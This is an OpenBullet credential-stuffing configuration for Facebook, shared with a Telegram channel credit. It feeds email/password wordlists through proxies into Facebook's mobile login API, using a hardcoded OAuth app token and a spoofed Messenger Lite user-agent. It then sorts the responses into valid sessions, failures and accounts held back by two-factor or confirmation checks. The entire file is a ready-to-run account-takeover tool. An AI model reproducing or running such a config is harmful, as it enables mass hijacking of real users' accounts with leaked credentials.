[SETTINGS]
{
  "Name": "Facebook",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2021-08-24T21:56:29.9077824+04:30",
  "AdditionalInfo": "Telegram Channel: T.me/OpenBulletChannel | Move 2FA Accounts to Custom | CPM Rate: 100_1000",
  "RequiredPlugins": [],
  "Author": "@TheOwn",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://b-api.facebook.com/method/auth.login" 
  CONTENT "email=<USER>&password=<PASS>&credentials_type=password&error_detail_type=button_with_disabled&format=json&device_id=cdc4558c-4dd4-4fd0-9ba6-d09e0223d5e5&generate_session_cookies=1&generate_analytics_claim=1&generate_machine_id=1&method=auth.login" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "authority: b-api.facebook.com" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "authorization: OAuth 200424423651082|2a9918c6bcd75b94cefcbb5635c6ad16" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko) [FBAN/MessengerLite;FBAV/115.0.0.2.114;FBPN/com.facebook.mlite;FBLC/ar_EG;FBBV/257412622;FBCR/Orange - STAY SAFE;FBMF/Xiaomi;FBBD/xiaomi;FBDV/Redmi 7;FBSV/9;FBCA/arm64-v8a:null;FBDM/{density=2.0,width=720,height=1369};]" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Invalid username or password" 
  KEYCHAIN Success OR 
    KEY "session_key" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "User must verify" 
  KEYCHAIN Custom "UnConfirm" OR 
    KEY "User must confirm" 

